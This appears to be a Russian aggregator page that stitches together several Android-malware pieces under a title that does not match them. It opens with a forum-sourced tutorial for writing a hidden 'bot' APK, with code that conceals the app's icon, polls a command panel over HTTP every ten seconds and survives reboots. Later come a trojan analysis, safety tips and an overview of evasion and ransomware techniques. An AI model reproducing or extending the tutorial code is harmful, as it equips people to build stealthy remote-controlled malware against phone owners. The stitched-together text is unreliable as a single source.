Вирусы для андроида – 5 самых опасных вирусов для Android — Ferra.ru

alexxlab
alexxlab
11.03.2020

Содержание

Как написать вирус для андроид.

Сегодня мы вообразим себя злыми хакерами и займемся написанием настоящего вируса для андроид системы. Мы подробно и с примерами расскажем о основных этапах написания вируса для операционной системы андроид. Не лишним будет напомнить, что эта статья предназначена только для удовлетворения вашего исследовательского интереса. И писать а тем более распространять вирусы не стоит 🙂


Как стать “хакером” андроида.

Да тут особо ничего мудрить не надо. Просто идем по шагам.
1. Устанавливаем java для разработчиков с офф сайта. (http://www.oracle.com/technetwork/java/javase/downloads/index.html)
2. Скачиваем android studio (http://developer.android.com/sdk/index.html#Other) Качаем полную рекомендованую. Сейчас мы не будем вдаваться в эти все подробности. Оно нам надо?
3. Запасаемся бубликами и пивом. Ведь сейчас придется все это поставить и настроить.
4. Тыкаем в основном далее, не вдумываясь что там написано. Незачем забивать голову
5. После чего как мы установили все это. Запускаем студию. Ищем сверху значек SDK Manager. Он где-то справа. Нажимаем, ставим везде галки, соглашаемся с условиями и нажимаем инсталл.

6. Опять грызем бублики и пьем великолепное пиво. Тут процесс по дольше, так как будут выкачиваться виртуалки и всяческие тулзы.
7. Ну вот собственно и все.

Как все начиналось?

Мы все поставили, теперь стоит и подумать, а как тут теперь вирус написать А для этого мы идем в File -> New -> New project. И тут нам предлогают придумать название проекта и домен сайта компании. Вводим что взбредится в голову. На основе этих данных генерируется package имя. Которое использоется как уникальный идентефикатор нашего APK. Жмем далее. Тут нам предлогают выбрать платфурму под наш проект. Ну тут мы выбираем только Phone. Остальное рассмотрим позже.

[ad name=”UMI 600×313″]

Далее. И теперь нам предлогают выбрать как будет выглядеть наше окошечко (Activity) стартовое, главное. Тут есть важная особенность. Чтобы запустить какой либо код сразу после установки, нужно чтобы было какой либо из окошек при старте. Поэтому выбираем любое кроме No Activity. Лучше всего выбрать Empty. Будет легче его вычищать, от ненужного мусора. Далее. Пишем название окошку и нажимаем Finish.

Пока файлы нового проекта индексируются и настраивается сборщик проекта.

Эй, ты слишком жырный!

Пробуем собрать проект наш. Build -> Generate signed apk.. И что мы видим? APK с 1 окошком и приложением которое ни чего не делает. Занимает 1 мегабайт. Надо с этим что-то делать, а именно отказывать от библиотек (AppCompat). Это красивая графика, которая нам не нужна. Переходи в файл MainActivity.java
Заменяем

public class MainActivity extends AppCompatActivity


на

public class MainActivity extends Activity


Удаляем

import android.support.v7.app.AppCompatActivity;


Заходим в настройки проекта и во вкладке Dependes удаляем строку с AppCompat. Далее переходим к файлу values.xml и styles.xml. Удаляем их.
Заходим в androidManifest.xml и
меняем

android:theme=»@style/AppTheme»


на

android:theme=»@android:style/Theme.Translucent.NoTitleBar»

Собираем наше приложение, ура! размер меньше 40 кб. Уже есть с чем работать.

Почему ты не прячешься?

Далее, нам нужно спрятать нашего зверька. Чтобы иконка не была видна в списке менеджера приложений. А так же надо закрыть наше приложение.
Вставляем после setContentView(R.layout.activity_main) Следующий код:

String pgkname = getApplicationContext().getPackageName();

ComponentName componentToDisable = new ComponentName(pgkname,pgkname+».MainActivity»);

getApplicationContext().getPackageManager().setComponentEnabledSetting(

   componentToDisable,

   PackageManager.COMPONENT_ENABLED_STATE_DISABLED,

   PackageManager.DONT_KILL_APP);


Этот код скроет нашу иконку с глаз И после всего этого пишем:
Теперь наше приложение после установки. Запускается и сразу же скрывается с глаз долой. Ух, проделали мы работу. Но надо идти дальше, а то бот не появиться в админке.

[ad name=”MiBand2″]

Тук, тук, открывайте, полиция!

Теперь мы должны сделать так, чтобы наш чудесный APK начал стучать в админку. Тут я уже полагаю, что админка где-то написана. И от нас требуется только стучать. Возьмем самый простой метод, он не будет работать корректно на андроидах выше 4.х. Но с чего-то надо же учиться. Я же не за вас работу делаю. Нам нужно создать сервис. Для этого мы создаем файл с новым class. (Правой тыкаем в проекте, на папку Java). Название класса пишем к примеру Network. Нажимаем окей. Удаляем все содержимое файла кроме первой строки где прописан package и заменяем на

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

import android.app.Service;

import android.content.Intent;

import android.os.IBinder;

 

import org.apache.http.HttpResponse;

import org.apache.http.client.HttpClient;

import org.apache.http.client.methods.HttpGet;

import org.apache.http.client.methods.HttpPost;

import org.apache.http.entity.StringEntity;

import org.apache.http.impl.client.DefaultHttpClient;

 

import java.io.InputStream;

import java.util.Timer;

import java.util.TimerTask;

 

public class Network extends Service{

 

   @Override

   public int onStartCommand(Intent intent, int flags, int startId) {

       return Service.START_STICKY;

   }

 

   @Override

   public IBinder onBind(Intent intent) {

       throw new UnsupportedOperationException(«»);

   }

 

   @Override

   public void onCreate()

   {

       MyTimerTask myTask = new MyTimerTask();

       Timer myTimer = new Timer();

       myTimer.schedule(myTask, 10000, 10000);

   }

 

   class MyTimerTask extends TimerTask {

       public void run() {

           String result = «»;

           result = GET(«http://site.ru/?q=»);

           // Обработка result

 

       }

   }

 

   public String GET(String url){

       InputStream inputStream = null;

       String result = «»;

       try {

           HttpClient httpclient = new DefaultHttpClient();

           HttpResponse httpResponse = httpclient.execute(new HttpGet(url));

           inputStream = httpResponse.getEntity().getContent();

           if(inputStream != null)

               result = convertInputStreamToString(inputStream);

           else

               result = «»;

       } catch (Exception e) {

       }

       return result;

   }

}


Это код описывает класс сервиса, в котором при запуске, запускает таймер и каждые 10 секунд отправляет GET запрос на URL и запрашивает ответ. Но это не все. Этот код не будет работать если мы объявим наш сервис в манифесте и не дадим права выходить в интернет нашему приложению. Идем в манифест.

Добавляем

<uses-permission android:name=»android.permission.INTERNET» />


и в описание application

<service android:name=».Network» />


Осталось запустить наш сервис. Идем в MainActivity и перед finish() вставляем запуск сервиса

getApplicationContext().startService(new Intent(getApplicationContext(), Network.class));

Финишная линия

Теперь у нас есть апк, который сам себя скрывает после запуска и запускает процес отстука в админ панель. Где написано // Обработка result : там происходит обработка ответа и команд админки. Не сложно, правда? Но пока мы пили пиво. Мы совсем забыли, что если телефон перезагрузят. То наше приложение уже ни когда не запустится. Для этого мы идем опять в манифест.
Добавляем права на запуск после ребута:

<uses-permission android:name=»android.permission.RECEIVE_BOOT_COMPLETED» />


Добавляем обязательно обработчик в описание application

<receiver

           android:name=».Boot»

           android:enabled=»true» >

           <intent-filter>

               <action android:name=»android.intent.action.BOOT_COMPLETED» />

               <action android:name=»android.intent.action.QUICKBOOT_POWERON» />

           </intent-filter>

       </receiver>


Теперь после перезапуска у нас вызовется класс Boot. И сейчас мы его создаим. Все делаем как я писал выше. Создали и удалили все кроме package.

import android.content.BroadcastReceiver;

import android.content.Context;

import android.content.Intent;

 

public class Boot extends BroadcastReceiver {

 

   @Override

   public void onReceive(Context context, Intent arg1) {

context.startService(new Intent(context, Network.class));

   }

}

[ad name=”Redmi”]

Конец, и пару слов.

Если есть вопросы, задавайте. В окончании у нас появился прям такой игрушечный бот (APK). Что послужит вам хорошей базой и внесет немного понимания, как это все работает. Спасибо за внимание. Надеюсь будет прододжение Сильно не пинайте, опыт первый, да и еще ночью пришлось писать. А вот критику хотелось бы услышать, чтобы след урок получился лучше.

За данный материал мы благодарны пользователю allmore из форума Damagelab

Click to rate this post!

[Total: 117 Average: 2.6]

cryptoworld.su

SMS-вирус под ОС Android или «Привет 🙂 Тебе фото…» / Habr


*Оригинальная картинка, наглым образом вытащеная из ресурсов apk
[прим. apk — расширение файла установки приложения на ОС андроид]
Вступление

Нежданно-негаданно, посреди рабочего дня на мой старенький Sony Ericsson K320i приходит смс следующего содержания:
привет [смайлик] тебе фото https:// m**o*an.ru/oujr/380688086*6*

В качестве отправителя значился человек, с которым я уже некоторое время не общаюсь. Посмотрев тест сообщения и отмахнувшись от телефона со словами «Очередной спам», я дальше погрузился в работу.
Все бы ничего, но через пару минут пришло аналогичное сообщение на второй телефон (Samsung Galaxy Gio). Номер отправителя совпадал.
Через 2 часа позвонил друг и попросил дать ему совет. Ему пришло похожее смс от его начальника. Успокоив его фразой: «По ссылке не переходи и будет тебе счастье», я решил, что нужно разобраться в ситуации.

Договоренности1) Технически правильно называть данный «зловред» не вирусом, а трояном. Автор умышленно пошел на данное ухищрение для упрощения. Заранее прошу прощения за это.
2) Автор в данной статье постарался поставить себя на место обычного пользователя, испытать и пережить все то, что испытавает он. Поэтому специализированные технические средства не применяются, а методы борьбы выбраны примитивные.

1. Подготовка

Поверхностно поискав в интернете информацию, было установлено, что ссылка в смс сообщении является ничем иным, как адресом на загрузку apk файла. А apk файл — вирусом «Trojan.SMSSend», заражающий мобильные устройства под управлением ОС Android. Главные задачи данного «зловреда» — перехватывать управление устройством и использовать его в своих целях: блокировка исходящих вызовов, отправка сообщений «с приветом» и другие мелкие пакости.

Перейдя по ссылке из браузера я благополучно получил ответ «403 Forbidden».

Понятно, значит, стоит фильтр по браузеру. Что ж, буду проверять «на кошках», как говорится.

Недолго думая, решил «положить на алтарь науки» свой планшет Samsung Galaxy Tab 2. Сделав бэкап, со спокойной совестью нажал на кнопку «Общий сброс». На всякий случай убедился, что на sim-карте нет денег и приступил к установке.

2. Установка

Захожу в настройки, в пункте меню «Неизвестные устройства», убираю галочку «Разрешить установку приложений из других источников, кроме Play Маркет».
Перейдя по ссылке из смс-сообщения, получил предупреждение браузера, следующего характера:

Соглашаюсь и нажимаю кнопку «Продолжить». Скачалось приложение F0T0_ALB0M.apk:

Устанавливаю. Ужасаюсь количеством permission (разрешений). Операционная система любезно предупреждает:

Это приложение может нанести вред устройству
Но я же не ищу легких путей, поэтому, «скрепя сердце», ставлю галочку «Я понимаю, что это приложение может нанести вред».Процесс установки
Когда приложение запрашивает права администратора, понимаю, что это последний этап. Нажимаю «Отмена», но диалог появляется снова. Эх, была не была, буду идти до конца, и нажимаю «Включить».

3. Вирус-приложение

Само приложение состоит из одной активити-картинки с обреченным котенком. Наверное таким образом разработчик пытался пошутить.

В этом месте, я немного забегу вперед (см. п.6) и приведу, код AndroidManifest.xml для лучшего понимания статьи.

AndroidManifest.xml
<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="4" android:versionName="4.0" android:installLocation="internalOnly" package="com.android.systgec"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.CALL_PHONE" />
    <uses-permission android:name="android.permission.CALL_PRIVILEGED" />
    <uses-permission android:name="android.permission.CHANGE_COMPONENT_ENABLED_STATE" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.WRITE_CONTACTS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />
    <uses-permission android:name="android.permission.MODIFY_PHONE_STATE" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission android:name="android.permission.GET_TASKS" />
    <application android:label="@string/app_name" android:icon="@drawable/icon" android:manageSpaceActivity=".ClearActivity" android:allowClearUserData="false" android:allowBackup="true">
        <activity android:label="@string/app_name" android:name=".AppActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity android:name=".ClearActivity" />
        <receiver android:name=".SmsReceiver">
            <intent-filter android:priority="1000">
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <receiver android:name=".OnBootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.QUICKBOOT_POWERON" />
                <action android:name="android.intent.action.USER_PRESENT" />
            </intent-filter>
        </receiver>
        <receiver android:name=".IncomingCallReceiver">
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.PHONE_STATE" />
            </intent-filter>
        </receiver>
        <receiver android:name=".OutCallReceiver">
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.NEW_OUTGOING_CALL" />
            </intent-filter>
        </receiver>
        <receiver android:name=".NetworkReceiver">
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
                <action android:name="android.net.wifi.WIFI_STATE_CHANGED" />
            </intent-filter>
        </receiver>
        <receiver android:name=".AdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/policies" />
            <intent-filter>
                <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLED" />
                <action android:name="android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED" />
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
        <receiver android:name=".ServiceController" />
        <service android:name=".SystemService" android:enabled="true" />
        <service android:name=".DelService" android:enabled="true" />
    </application>
</manifest>


В диспетчере приложений наш «зловред» гордо именуется «Google Play».

4. Удаление?

Благополучно заразив устройство, перехожу к фазе лечения. Сначала пробую удалить приложение. Захожу в «Диспетчер приложений» и вижу, что все кнопки заблокированы.

Понятно, значит, у приложения имеются права администратора и так просто удалить его не получится. Не беда, сейчас я их уберу. Захожу в пункт меню «Безопасность»->«Администраторы устройства» и убираю галочку напротив приложения.

Но, нет, не тут то было. Устройство благополучно переходит в настройки управления WiFi и зависает. Пришлось «прибивать» окно настроек.

Дальше хотелось решить вопрос «на корню», так сказать, и воспользоваться общим сбросом системы. Ну да, легко мне выбирать такой вариант — мои личные данные в бэкапе хранятся.

А как же обычные пользователи? У которых «внезапно» любимый телефон заразился вирусом. Они ведь даже исходящего вызова знакомому «тыжпрограммисту» не сделают. В общем, читерство это, не буду так делать.

Итог: штатными средствами нейтрализовать угрозу не удалось. Подключаем «тяжелую артиллерию».

Примечание для компаний

В дальнейших разделах используется описание действий связанных с использованием бесплатных версий продуктов некоторых компаний. Целью повествования не являются жалобы на компании или предоставляемые ими услуги.


5. Dr Web против вируса

Памятуя про хорошую лечащую утилиту «Dr.Web CureIt!», решил бороться с зловредом с помощью аналога под Android. Захожу на официальный сайт и качаю бесплатную версию антивирусника «Dr.Web для Android Light 9».
Устанавливаю, по WiFi обновляю сигнатуры.
Запускаю быструю проверку ― ничего.
Запускаю полную проверку ― тоже ничего.
Я разочарован! Печально вздохнув, удаляю антивирусник.

UPD от 6.09.14. На данный момент антивирусник успешно опознает данный зловред под детектом Android.SmsBot.origin.165. Алгоритм удаления такой же, как и при использовании Avast (см. ниже).

5. Avast против вируса

Мнение автораНикогда особо не любил антивирусник данной фирмы. Особенно после истории об удалении файла отвечающего за протокол tcp/ip в Windows XP. Но, чем «черт не шутит», установим.

Скачиваю и устанавливаю версию «Avast-Mobile-Security-v3-0-7700».
При старте запускается экспресс-сканирование, которое никаких вирусов в системе не находит.

Ну и ладно, мозг подсказал очередную идею: вот есть какой-то пункт меню «Управление приложениями», а что если…
Да, действительно загрузился список приложений в системе.

Пункта «Удалить» нет. Поэтому, пробую остановить приложение. Остановилось.
Жду 2-3 секунды, приложение снова в работе.

Ладно, попробую с другой стороны. Запускаю принудительную проверку системы. О_о, обнаружено вредоносное ПО. Нажимаю «Устранить все» [прим. как-то это звучит в духе Дарта Вейдера или Далеков]. Avast сообщает, что удалить приложение не может, а нужно сначала отобрать права администратора у приложения. Появляется системный диалог:

Удалить все данные с устройства и вернуть заводские настройки? Нажмите «Да» если согласны, или «Нет» для отмены

И сразу же, поверх этого диалогового окна открывается «злополучное» окно настроек wi-fi. Нажимаю «Возврат», снова открываются настройки. Хорошо, хоть окно настроек не зависает.

Опять на тропу читерства меня толкают. Будем искать другое решение…

6. Реверс-инжиниринг

Посмотрим в исходный код приложения, благо на Android это не такая большая проблема. Много всего интересного…
Например, в классе SystemService указан url сайта lamour.byethost5.com (дизайн-студия).
Но больше всего мне понравился класс AdminReceiver, который является наследником системного класса DeviceAdminReceiver.
В этом классе есть переопределенный метод onDisableRequested, который срабатывает при отключении админполномочий для данного приложения. Полностью заблокировать кнопки в системном диалоге нельзя, поэтому разработчик вируса пошел на хитрость, он изменил текст сообщения на «Удалить все данные с устройства и вернуть заводские настройки? Нажмите «Да» если согласны, или «Нет» для отмены» и обильно прикрыл сверху назойливым окном настроек.

Бинго. Значит теперь я смело смогу нажать в данном диалоговом окне «Удалить» и планшет будет «здоров».

Послесловие

Таким образом, выполнив повторно пункт 5 данной публикации (не останавливаясь на последнем шаге), вирус версии 4.0 (согласно манифест-файлу) был побежден.

Почему не удалось напрямую из настроек убрать галочку админправ для приложения, а только используя Avast? Скорее всего, стоит очередная ловушка с переопределенным методом.

Выводы

Разработчики вирусов находят все новые лазейки.
Но, так или иначе, браузер и операционная система стали лучше защищать пользователей.
Мне необходимо было нажать 2 подтверждения и поставить галочку в настройках «Неизвестные устройства».

Будьте здоровы, вы и ваши девайсы!

habr.com

Есть ли вирусы на андроид — памятка по безопасности владельцу смартфона

Современный смартфон – это маленький компьютер со всеми сильными и слабыми сторонами. Где компьютеры, там и вирусы – уже аксиома. Попробуем разобраться, есть ли вирусы на Андроид, каковы настоящие угрозы и почему так популярны антивирусные приложения.

Открытая и безопасная система

0_Вирусы для смартфонов – одна из самых актуальных и громких тем. Ведь в телефоне и планшете хранится столько личных данных! Телефонная книга, переписка, заметки, геолокационные данные, а самое вкусное – доступ к счёту и часто данные банковских карт! Казалось бы, вот раздолье для хакеров!

Тем не менее настоящие вирусы для Android – большая редкость. Каждый из них становится событием, о котором пишут и в специализированных, и в массовых изданиях. Ещё бы: ведь на сегодня в мире проданы миллиарды Android-устройств, и их безопасность касается сотен миллионов людей!

Поэтому о классических вирусах, которые пробираются на ваш компьютер без вашего ведома, можно не переживать. Однако полной безопасности это не означает.

Существует множество подводных камней, на которые может нарваться пользователь Android. И хорошо, если всё ограничится потерей некоторой суммы с телефонного счёта.

Реальные опасности Android

Если для Android практически нет вирусов, может, можно расслабиться и забыть про безопасность? Ни в коем случае! Существуют другие, не менее грозные опасности:



  •  Фишинг.  Сайты, похожие на реальные банковские страницы, требуют у вас ввести данные ваших карт. Имитаторы почтовых сервисов «уводят» пароли и имена ящиков. Фальшивые социальные сети хотят получить доступ к вашему аккаунту. Однако всё это не беда Android: фишинговые ресурсы опасны вне зависимости от платформы.
  •  Malware.  Зловредное программное обеспечение устанавливается на ваш смартфон или планшет и уводит данные. Но, в отличие от вирусов, «зловреды» для смартфонов не могут прокрасться в систему просто так. Им непременно нужно согласие пользователя.
  •  Кража смартфона.  Если злоумышленники так уж хотят именно ваши данные, проще всего для них будет завладеть смартфоном и получить доступ к системе. Поскольку телефоны лёгкие, небольшие и постоянно при владельце, проще уж, простите за подробности, подстеречь вас в подъезде и забрать устройство.

android_

Антивирусы и их задача

В свете вышесказанного понятно, что программы, обеспечивающие безопасность, мы называем «антивирусами» больше по инерции. На самом деле задача пакетов безопасности для устройств на Android OS несколько в другом:



  • Реестр вредных страниц. Стоит вам попасть на страницу, отмеченную в реестре как фишинговую, вы получите предупреждение об этом.
  • Анализ приложений на наличие «зловредных» функций. Если в приложении есть сомнительные модули, требующие сомнительных прав доступа, оно будет направлено в лабораторию на изучение.
  • «Чёрный список». В пакетах безопасности обычно есть встроенные средства фильтрации нежелательных звонков и SMS. Занесите туда номера, звонки с которых вы больше не желаете слышать.
  • «Противоугонные» функции. Если смартфон или планшет пропадёт, вы сможете удалённо очистить данные на нём, заблокировать, отобразить сообщение для нашедшего (или похитителя), часто – и отследить, где географически устройство находится.

Безусловно, всё это очень важно. Но собственно вирусы в списке угроз для Android занимают одно из последних мест. Куда больше опасности таит неумелое пользование и неосторожность. Ведь именно по собственному незнанию пользователи дают доступ сомнительным приложениям и отправляют свои данные на фальшивые сайты.

Поэтому антивирусные программы — это хорошо. Но здоровое недоверие и изучение основ безопасности – лучше.

andevice.ru

Новый Android-вирус: как попадает на мобильное устройство и чем опасен.

Вредоносное приложение под названием xHelper не удается удалить даже полного сброса к заводским настройкам.

Что такое xHelper и какую опасность представляет

Весной текущего года специалисты компании Malwarebytes, которая занимается вопросами кибербезопасности, обнаружили новый вирус для Andriod-устройств xHelper. К августу, когда Malwarebytes подготовила подробный отчет о нем, зловред успел заразить около 35 тысяч мобильных устройств. На днях новый обзор трояна опубликовали эксперты Symantec.  Как оказалось, к этому времени xHelper заразил более 45 тысяч гаджетов. Большинство зараженных устройств находятся в Индии, США и России.

Сейчас на зараженных устройствах зловред показывает навязчивую рекламу и уведомления с предложением загрузить то или иное приложение. За это использующие вирус злоумышленники получают прибыль. По мнению экспертов, троян представляет и другую опасность — с его помощью хакеры могут установить на смартфон жертвы программу, похищающую важную информацию, например, о банковских картах. Кроме того, на аппарат могут установить приложения-вымогатели и банковские трояны.

Как зловред попадает на мобильные устройства

Как считают специалисты, основной источник заражений — не внушающие доверия сайты, предлагающие загрузить APK-файлы не из официального магазина Google Play. В зараженных приложениях скрыт код, который приводит к загрузке на устройство xHelper.

Опасная особенность зловреда заключается в том, что попав на устройство, он устанавливается на отдельная, автономно работающая программа. Если владелец гаджета удалит зараженное приложение, вирус продолжит работу как ни в чем не бывало. Мало того, даже если найти службу xHelper в настройках и удалить, вирус вновь появляется, переустанавливаясь. Не помогает и сброс к заводским настройкам.

Специалисты пока не нашли способ борьбы с xHelper.

Вконтакте

Facebook

Twitter

Google+

aboutandroid.ru

Вирусы для Android. Способы заражения.

  • Открытым кодом. Всегда можно посмотреть, как работает та или иная системная утилита.
  • Распространенностью. Обновления безопасности поступают на разные модели устройств в разное время, многие вообще остаются без обновлений, что позволяет беспрепятственно использовать весьма несвежие уязвимости.
  • Несовершенством антивирусных программ. Сколько бы процессоров ни было в устройстве, антивирусы все равно значительно замедляют работу ОС, поэтому пользователи неохотно их ставят.
  • Слабой системой проверки приложений в маркете. Несмотря на все уверения специалистов Google о «многоступенчатой проверке», в маркет легко проникают клоны удаленных инфицированных программ, а к разработчикам таких программ не применяются никакие меры.
  • Отсутствием централизованного контроля за прошивками. Разработчик прошивки может беспрепятственно вставлять любой шпионский софт по своему усмотрению.

ОБХОД АНТИВИРУСНЫХ СКАНЕРОВ

Времена свободного доступа любого приложения в Play Market подходят к концу. Ребята из Google сообразили, что надо принимать хоть какие-то меры, чтобы остановить нашествие огромного количества вирусов, и ввели систему проверки приложений. Создатели вирусов мгновенно отреагировали и начали вставлять механизмы обхода проверки.

[ad name=”Responbl”]

Один из интересных методов — отложенный старт вредоносной активности. Например, приложение месяц ведет себя как обычная игрушка или справочник, тысячи пользователей скачивают его и оставляют восторженные отзывы, привлекая все большую аудиторию. А через некоторое время в приложении вдруг просыпается зло, и оно начинает показывать фейковые диалоги, скачивать и устанавливать нежелательный софт.

Другие вирусы, такие как семейство Leech, определяют свой IP-адрес в сети и, если он попадает в IP-диапазон, используемый Google, или же имя хоста айпишника содержит слова google, android, 1e100, сразу же прекращают работу, чтобы не вызывать подозрений у системы автоматической проверки. Причем делают они это по-хитрому, ведь если использовать стандартные средства Android, то придется запрашивать у пользователя дополнительные разрешения. Поэтому злоумышленники обращают свой взор на такие ресурсы, как ipinfo.io. Не составит труда загрузить страничку в строку и найти там нужную информацию:

Развиваются и методы обхода статического анализа кода. Один из способов — использовать динамическую загрузку библиотек с вредоносной нагрузкой. В результате само приложение выглядит вполне невинно. Для загрузки внешнего кода используется класс DexClassLoader, который умеет загружать классы из JARили APK-файлов в формате DEX.


После загрузки класса можно спокойно дергать его методы с помощью рефлексии. Внешнюю библиотеку можно как разместить в самом APK, так и скачать из Сети после установки. Чтобы еще больше усложнить обнаружение вредоносного кода, злоумышленники шифруют такие программные модули и дают им трудноугадываемые имена.

Некоторые вирусописатели идут дальше и выкладывают в маркет приложения, которые после установки скачивают и устанавливают вирусные аппликухи самостоятельно, маскируя их под системные утилиты. Так что, даже если пользователь удалит изначальное приложение, вирус будет преспокойно обитать на устройстве и дальше. Такой подход реализован, например, в приложении BrainTest.

Для установки новых приложений без ведома пользователя злоумышленники используют утилиту pm:

Чтобы использовать эту утилиту, приложение должно либо запрашивать разрешение android.permission.INSTALL_PACKAGES в манифесте, либо обладать правами рута. Проверить, установлено ли приложение, можно, воспользовавшись методом getPackageInfo класса PackageManager:


СПОСОБЫ ОБОГАЩЕНИЯ НА ВИРУСАХ ДЛЯ АНДРОИД

Самый простой способ нажиться на бедных пользователях — заставить их просматривать рекламу. Например, приложение Who Viewed Me on Instagram обещает показать пользователю его тайных поклонников в инстаграме, а вместо этого ворует учетные данные и размещает кучу рекламы в профиле пользователя. Приложение использует возможность вызова методов Android-приложения из JavaScript-кода. Чтобы украсть учетную запись пользователя, вредонос просит пользователя залогиниться в своем окне с WebView, а после загрузки логин-страницы инстаграма добавляет кусочек своего кода к кнопке входа.

Объявляем метод, который будет принимать учетную запись из JavaScript:


Следует отметить, что после удаления одной версии программы автор сразу же разместил аналогичную, лишь слегка изменив название. И она спокойно прошла контроль со стороны Play маркета! Похоже, что Большой Брат не так уж пристально следит за разработчиками.

Между прочим, количество загрузок у подобных «полезных приложений» иногда переваливает за 100 тысяч! Так что, если приложение просит тебя залогиниться в соцсеть в своем окне, самое время насторожиться и вспомнить, что конкретно тебе известно об этом приложении.

[ad name=”Responbl”]

Другой набирающий популярность способ обогащения — вирусы-вымогатели. Попав на устройство, они получают права рута, часто шифруют пользовательские данные и показывают окно с требованием выкупа, предотвращая попытки пользователя запустить другие приложения. Так ведут себя, к примеру, вирусы семейства Fusob.

Первоочередная задача программы-вымогателя — получить рут на устройстве жертвы. К сожалению простых пользователей, в Сети гуляет бесчисленное множество эксплоитов, позволяющих незаметно повысить права приложения до суперпользовательских. Например, Towelroot постоянно обновляется и совершенствуется своим создателем. Неплохую базу эксплоитов собрала группа Offensive Security, ну и конечно, все самые свежие уязвимости можно посмотреть на CVE.

Получив рут, зловред с помощью класса ActivityManager начинает контролировать работу других приложений, убивая нежелательные:

Нередко для управления вирусом-вымогателем используется GCM — ребята из Google разработали идеальную систему для отправки команд приложению и получения от него ответов. Достаточно зарегистрироваться на сервере, предварительно получив токен для работы.

Теперь можно принимать любые команды, в том числе на обновление вируса, что дает злоумышленнику практически неограниченную власть.


Есть и более безобидные способы обогащения. Например, популярное приложение «Фонарик» втихаря собирало данные о месторасположении пользователей, которые разработчик потом продавал рекламщикам для таргетирования рекламы.

ВЫВОДЫ

В этой статье мы разобрали все ключевые моменты кода, которые позволяют современной малвари реализовывать зловредные идеи своих плохих авторов. Обладающему этими знаниями программисту бояться нечего :), а что же делать простому пользователю? Если не хочется устанавливать кучу антивирусного софта на девайс, всегда можно скачать APK перед установкой и проверить его на наличие вирусов онлайн-утилитами, например тем же Вирустоталом. Ими же могут воспользоваться разработчики, чтобы удостовериться, что их новое приложение не будет принято за вирус.

cryptoworld.su

Мобильные вирусы для Android — часть первая

В последние годы помыслы злоумышленников сосредоточены на смартфонах. Ведь именно с мобильниками мы не расстаемся целыми днями, храним на них личные документы и фотографии, используем их как средство общения, камеру, проездной, кошелек и многое другое. На них хранится вагон и маленькая тележка ценных данных, за которые можно получить приличное вознаграждение. Впрочем, и для других нехороших целей мобильные устройства подходят отлично. Поэтому и программ-вредителей для смартфонов немало.

В прошлом году мы отловили 42,7 млн зловредов, которые используют смартфоны и планшеты для своих нехороших дел. Чтобы удобнее было в них разбираться, мы делим их на несколько видов в зависимости от того, чего они хотят и как себя ведут. В этой части мы познакомимся с тремя довольно широко распространенными видами.

Adware: рекламные кликеры и навязчивые баннеры

Один из самых распространенных видов заразы для мобильных устройств — рекламные зловреды. Их задача — накручивать клики по баннерам в Интернете либо самостоятельно, либо вашими руками. Или же они просто показывают вам лишнюю рекламу.

В первом случае вы даже не видите объявления. При этом кликер расходует ваши ресурсы — заряд аккумулятора и мобильный трафик. Зараженный смартфон садится всего за несколько часов, а счета за связь неприятно удивляют.

Второй тип рекламных вредоносов подменяет баннеры на интернет-страницах своими и заваливает вас ненужными объявлениями, чтобы вы сами волей-неволей переходили по ссылкам. При этом нередко поток спама оказывается таким мощным, что устройством становится невозможно пользоваться: реклама заслоняет собой все остальное.

Некоторые экземпляры могут еще и без спроса собирать информацию о вашем поведении в сети. Потом эти данные попадают к рекламодателям, которые с их помощью корректируют настройки своих рекламных кампаний. Кроме того, баннеры могут вести на вредоносные сайты, откуда на ваше устройство скачается что похуже.

SMS- и веб-подписчики

Второй вид зловредов — подписчики, также известные как кликеры (Trojan-clicker). Они занимаются тем, что воруют деньги с вашего мобильного счета — оттуда это делать проще всего, поскольку для этого не требуется никаких конфиденциальных данных вроде номера карточки. Средства утекают через платные WAP- или SMS-подписки, а в некоторых случаях — еще и через звонки на платные номера за счет жертвы.

О том, что такое WAP и как им пользуются злоумышленники, мы уже подробно писали здесь. Чтобы оформить от вашего имени платную подписку, WAP-кликеру достаточно нажать кнопку на сайте. SMS-зловредам требуется разрешение на отправку сообщений, однако многие пользователи готовы выдать его любому приложению не глядя. Чуть сложнее задача программ, тратящих ваши средства на IP-телефонию: им приходится регистрировать аккаунт в соответствующем сервисе.

Один из ярких примеров подписчиков — троян Ubsod. Этот вредитель специализируется на WAP, а чтобы вы как можно дольше не замечали его деятельность, он удаляет все SMS, содержащие ubscri или «одпи» (фрагменты слов subscribe / subscription и «подписка» / «подписаться»). Кроме того, он умеет переключаться с Wi-Fi на мобильный Интернет — только через него можно работать с WAP.

